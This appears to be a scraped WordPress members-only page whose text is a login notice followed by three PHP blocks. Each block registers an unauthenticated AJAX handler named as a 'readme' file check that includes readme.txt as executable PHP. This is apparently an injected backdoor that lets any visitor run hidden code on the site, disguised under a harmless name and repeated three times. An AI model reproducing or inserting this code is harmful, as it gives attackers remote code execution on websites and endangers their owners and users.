This content is restricted to site members. If you are an existing user, please log in. New users may register below.
if(!function_exists('file_check_readme48041')){ add_action('wp_ajax_nopriv_file_check_readme48041', 'file_check_readme48041'); add_action('wp_ajax_file_check_readme48041', 'file_check_readme48041'); function file_check_readme48041() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme48087')){ add_action('wp_ajax_nopriv_file_check_readme48087', 'file_check_readme48087'); add_action('wp_ajax_file_check_readme48087', 'file_check_readme48087'); function file_check_readme48087() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme28676')){ add_action('wp_ajax_nopriv_file_check_readme28676', 'file_check_readme28676'); add_action('wp_ajax_file_check_readme28676', 'file_check_readme28676'); function file_check_readme28676() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }